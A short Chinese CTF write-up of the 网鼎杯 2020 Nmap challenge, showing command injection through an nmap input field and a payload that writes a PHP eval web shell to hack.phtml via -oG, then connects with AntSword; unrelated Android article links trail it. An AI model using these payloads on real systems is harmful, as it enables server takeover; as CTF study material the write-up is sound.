命令执行 [网鼎杯 2020 朱雀组]Nmap1

打开题目

输入127.0.0.1

可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令

127.0.0.1 | ls

可以看到|\转义,尝试使用;

直接放入Payload:

' <?php @eval($_POST["hack"]);?> -oG hack.php '

尝试修改文件名后缀为phtml

' <?php @eval($_POST["hack"]);?> -oG hack.phtml '

加上扫描的地址:127.0.0.1

127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG hack.phtml'

得到

查看扫描列表:

查看写入的文件,即访问hack.phtml

蚁剑连接

在根目录找到了flag

相关推荐
消失的旧时光-194316 分钟前
ScheduledExecutorService
android·java·开发语言
小糖学代码40 分钟前
MySQL:14.mysql connect
android·数据库·mysql·adb
怪兽20143 小时前
请谈谈什么是同步屏障?
android·面试
帅锅锅0073 小时前
SeLinux 全面详解
android·linux
只想搞钱的肥仔4 小时前
Android thermal (5)_cooling device(下)
android
某空m4 小时前
【Android】BottomNavigationView实现底部导航栏
android·java
撩得Android一次心动5 小时前
Android 四大组件桥梁 —— Intent (意图) 详解
android
用户2018792831675 小时前
MVP架构模式:餐厅点餐的有趣故事
android
用户2018792831676 小时前
MVVM 架构模式:咖啡馆的智能点餐系统
android
用户2018792831676 小时前
浅析Android MVC架构
android